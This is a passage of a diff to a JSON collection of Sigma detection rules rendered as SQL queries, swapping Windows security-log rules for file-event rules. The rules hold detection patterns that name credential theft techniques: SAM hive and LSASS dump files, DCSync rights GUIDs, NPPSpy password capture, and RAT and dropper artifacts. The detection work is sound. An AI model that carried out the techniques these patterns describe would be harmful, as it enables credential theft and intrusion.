= 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_privileged_operation.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "Creation of an Executable by an Executable", + "id": "297afac9-5d02-4138-8c58-b977bac60556", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the creation of an executable by another executable", "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" - ], - "filename": "win_security_susp_lsass_dump.yml" - }, - { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Software installers", + "Update utilities", + "32bit applications launching their 64bit versions" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_dropper.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "status": "test", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", + "description": "Detects PowerShell creating a binary executable or script file.", "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "tags": [ + "attack.persistence" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "The Windows Defender Firewall Service Failed To Load Group Policy", - "id": "7ec15688-fd24-4177-ba43-1a950537ee39", - "status": "experimental", - "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" - ], - "filename": "win_firewall_as_failed_load_gpo.yml" - }, - { - "title": "Firewall Rule Modified In The Windows Firewall Exception List", - "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", - "status": "experimental", - "description": "Detects when a rule has been modified in the windows firewall exception list", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2005' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" - ], - "filename": "win_firewall_as_change_rule.yml" - }, - { - "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", - "id": "04b60639-39c0-412a-9fbe-e82499c881a3", - "status": "experimental", - "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2032')" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], - "filename": "win_firewall_as_reset_config.yml" - }, - { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" - ], - "filename": "win_firewall_as_delete_rule.yml" - }, - { - "title": "Windows Firewall Settings Have Been Changed", - "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", - "status": "experimental", - "description": "Detects activity when the settings of the Windows firewall have been changed", - "author": "frack113", - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2003', '2008'))" - ], - "filename": "win_firewall_as_setting_change.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", - "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "status": "test", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND 